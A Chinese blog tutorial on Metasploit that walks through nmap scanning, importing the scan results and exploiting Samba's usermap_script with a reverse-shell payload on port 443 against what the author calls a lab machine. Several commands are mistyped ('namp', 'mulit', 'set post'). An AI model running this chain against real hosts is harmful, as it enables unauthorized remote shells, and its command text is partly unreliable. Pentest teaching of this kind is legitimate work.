Metasploit的使用(是进行服务器端攻击时一种最流行的功能工具)

最新推荐文章于 2024-08-16 20:51:47 发布
最新推荐文章于 2024-08-16 20:51:47 发布
阅读量443 收藏 1
点赞数
分类专栏: 安全工具 文章标签: Metasploit

1、启动Metasploit

 声明:本次渗透测试的主机是我自己在自己的攻击主机上搭建的另一个操作系统,为了真实性设置了常见的IP地址,如有重合但绝对不是任何实体公司或者单位的IP地址。
 所以不承担任何法律责任   转载请注明出处

(转载:https://www.cnblogs.com/xinxianquan/p/9586041.html)
使用命令msfconsole 启动的时候需要启动两次,不然Postgres SQL数据库无法加载成功,导致 Metasploit Services无法启动,或者使用 msfgui启动界面形式的Metasploit,但是需要提前安装,另一个命令是 msfcli(command line-based) ,建议使用的时候直接采用传统的方式启用,这样其配置的数据库和服务才会启动
在这里插入图片描述

2、使用namp扫描侦查的地址范围,将生成的报告导入到Metasploit中进一步做处理。namp扫描的时间可能会很长。

在这里插入图片描述

3、扫描完 之后将生成的数据 导入到Metasploit中 使用命令 db_import my.xml,

或者使用一个主机 同时导入nmap扫描的数据 db_nmap -n -A

在这里插入图片描述

查询服务

在这里插入图片描述

查询漏洞

在这里插入图片描述

使用一个漏洞,查询这个漏洞需要的攻击载荷,根据攻击载荷我们提供需要的参数。

在这里插入图片描述

查询显示更多的有效载荷(因为一个漏洞可以运行多个载荷,所以可以替换不同的有效载荷)

在这里插入图片描述

设置要载入的有效载荷
在这里插入图片描述

一旦有效攻击载荷设置好之后再次查看一下确定设置的载荷是否成功设置

在这里插入图片描述

输入exploit 执行漏洞利用
在这里插入图片描述

现在把之前的测试漏洞命令总结一下:

第一步: namp 扫描IP地址范围主机 namp -n -oX my.xml 172.168.189.0/24

第二步:导入namp扫描的数据结果 db_import my.xml

第三步 :查看远程主机上运行的服务 service

补充一点(这里可以查询单个IP的主机 同时导入 namp的信息) db_namp -n -A 172.16.189.131

第四步:查询服务是否存在可以利用的漏洞信息 search samba(服务名) type:exploit platform:unix

第五步:利用漏洞 use exploit/mulit/samba/usermap_script

第六步:查询需要加载的配置参数和载荷 show options

第七步:查询需要漏洞的相对应的载荷 show payloads

第八步:设置载荷 set payload cmd/unix/reverse(载荷信息)

补充(有的攻击载荷需要自己的攻击主机的信息,需要自己添加)除此之外,我要说明一下这里被攻击的远程主机端口的设置;一般来说端口设置要避免远程端限制,443端口,443端口一般设置限制,该端口通常保留SSL流量,可以绕开端口部署的一些设置。

第九步:再次查看一下 加载的有效载荷 是否已经设置好 show options

第十步:设置RHost LHost 以极端口号 set RHOST 192.168.1.1 set post 443

第十一步:执行 exploit

liuhandong-99
关注
专栏目录
Metasploit SQL注入漏洞渗透测试实战
悦分享
12-07 1065
现代化Web应用程序在设计都会将代码与数据进行分离,这些数据会独立保存在服务器中。当数据量较大的候,需要使用一种特殊的数据管理程序,也就是常说的数据库。目前比较常用的数据库软件有MySQL、SQLServer、Access等,不过它们的操作都要遵循SQL(Structured Query Language,结构化查询语言)标准,但是不同的产品之间存在着一定的差别。SQL注入攻击是通过操作输入来修改SQL语句,以达到执行代码对Web服务器进行攻击的方式。
八大常用渗透测试工具
xuyx001的博客
08-24 5197
渗透测试
Metasploit
weixin_34092370的博客
09-04 115
1、启动Metasploit 声明:本次渗透测试的主机是我自己在自己的攻击主机上搭建的另一个操作系统,为了真实性设置了常见的IP地址,如有重合但绝对不是任何实体公司或者单位的IP地址。 所以不承担任何法律责任 转载请注明出处 使用命令msfconsole 启动的候需要启动两次,不然Postgres SQL数据库无法加载成功,导致 Meta...
实现一个Web版的类Metasploit攻击框架
Exploit的小站~
12-13 5686
这是我现在结题的一个专业实训中的一部分内容,小心翼翼地拿出来分享。 在项目中,攻击模块不仅提供自动化攻击功能,也提供了用户扩展的平台,通过规定编写规则来进行有效的扩展。 (1)攻击模块设计 该攻击模块采用命令行模式,设计功能示意图如下: (a)指定exp名称攻击: l全域名扫描 即针对现有的域名全部进行攻击。 python safecatcli.py -m exp
Metasploit漏洞利用系列(三):MSF渗透测试实战——网络服务器攻击渗透
最新发布
2402_86373248的博客
08-16 472
本文将围绕一个典型场景——利用MS17-010漏洞对Windows服务器进行渗透测试,以展示Metasploit的强大功能和渗透测试的实际操作步骤。通过本次实战,我们不仅展示了Metasploit在渗透测试中的强大能力,同也提醒所有系统管理员及更新系统和打补丁的重要性。记住,合法的渗透测试应当在授权和法律允许的范围内进行,旨在帮助提升网络安全,而非非法入侵。后续行动建议:在完成渗透测试后,撰写详细的报告,总结发现的安全漏洞,并提出相应的修补建议,帮助客户加强网络安全防护体系。命令检查目标是否易受攻击
Metasploit 安装与部署
angry_program的博客
02-17 1832
前言 Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。(来自百度百科) 总之是一款非常优秀的开源渗透测试框架。 安装Metasploi...
Metasploit自动攻击模块
weixin_33943347的博客
02-16 319
Metasploit自动攻击模块 Usage: db_autopwn [options] -h Display this help text -t Show all matching exploit modules -x Select modules based on vulnerability references ...
【2023最新版】超详细Metasploit安装保姆级教程,Wireshark抓包(网络分析),收藏这一篇就够了
Python_0011的博客
02-13 1136
Metasploit是一个渗透测试框架,可以帮助您发现和利用漏洞。Metasploit还为您提供了一个开发平台,您可以编写自己的安全工具或利用代码。今天,我将指导您了解如何使用Metasploit的基础知识:如何安装Metasploit使用框架以及利用漏洞。
Metasploit工具学习(一)
weixin_37879065的博客
04-22 2046
Metasploite工具学习简介安装核心模块常用命令永恒之蓝ms17_010实例 简介 Metasploite是由Rapid7开始的一个计算机安全项目,最著名的是其中一个子项目Metaploite Framework,这是一种用于针对远程目标机器执行漏洞利用代码的攻击框架。 安装 kali系统自带,安装方式自行百度 核心模块 Auxiliary:核心辅助模块 主要是扫描爆破,不会建立连接 E...
Metasploit工具学习(二)
weixin_37879065的博客
05-09 526
Metasploit持久化metsvcpersistence metsvc 通过服务(metsvc)启动的方式,其优点便是命令简单方便。使用此方式的后门不进行反弹回连,因此不必设置太多参数。该后门在目标机器启动后自启动一个”服务器”来等待黑阔连接,因此黑阔可以随随地通过该后门进入目标机器,十分简单方便。当然,其缺点也十分明显。当其他黑阔使用扫描软件扫出该”服务器”的存在,任何人便可以通过该后门...
使用Metasploit 获取远程 shell
KKKmeng的博客
06-08 257
The Metasploit Framework的简称。MSF高度模块化,即框架由多个module组成,是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。metasploit涵盖了渗透测试中全过程,你可以在这个框架下利用现有的Payload进行一系列的渗透测试。
metasploit-webapp-nostarch.zip
08-12
3. **Web应用漏洞测试**:nostarch1.zip中的工具可能包含了各种模拟攻击的脚本和配置文件,用于测试常见的Web应用漏洞,例如CSRF(跨站请求伪造)、SSRF(服务器端请求伪造)、LFI(本地文件包含)和RCE(远程代码...
Metasploit框架及其基本功能介绍
Metasploit框架提供了一系列功能强大的工具和资源,使渗透测试人员能够发现系统的漏洞并利用它们进行攻击。它支持多种操作系统和平台,包括Windows、Linux和Mac OS等。 Metasploit框架具有很多优点,比如易于使用、...
Metasploit安装教程,三分钟手把手教会,非常简单
Python_0011的博客
12-29 1741
【准备工作】
metasploit的客户端WEB攻击
天元喜羊羊的博客
05-28 3194
环境:BT5R3,XP SP3,IE6 操作如下: root@bt:/pentest/exploits/set# ./set ..######..########.######## .##....##.##..........##... .##.......##........
内网安全:Msfconsole攻击技术(成功拿下服务器最高权限.)
热门推荐
网络安全领域___专研者.
03-22 1万+
Msfconsole工具概括: Msfconsole简称(msf)是一款常用的渗透测试工具,包含了常见的漏洞利用模块和生成各种木马,方便于安全测试人员的使用. (1)进行端口扫描. (2)进行服务的扫描.(3)扫描3306(Mysql)端口的弱口令.(4)在msf模块里也可以使用nmap进行扫描.(5)扫描了服务器是用Win XP,然后对服务器进行渗透测试.
内网安全之:Metasploit 跳板攻击:portfwd 端口转发与端口映射
f_carey的博客
09-03 3038
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 Metasploit 中的端口转发与端口映射Metasploit portfwd 原理2 实验环境2.1 建立 meterpreter 反向连接2.2 portfwd 端口转发2.3 portfwd 端口映射 Metasploit portfwd 原理 portfwd 是借用 meterpreter s.
渗透测试神器之metasploit
weixin_52180702的博客
07-18 2481
metasploit 永恒之蓝漏洞复现
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值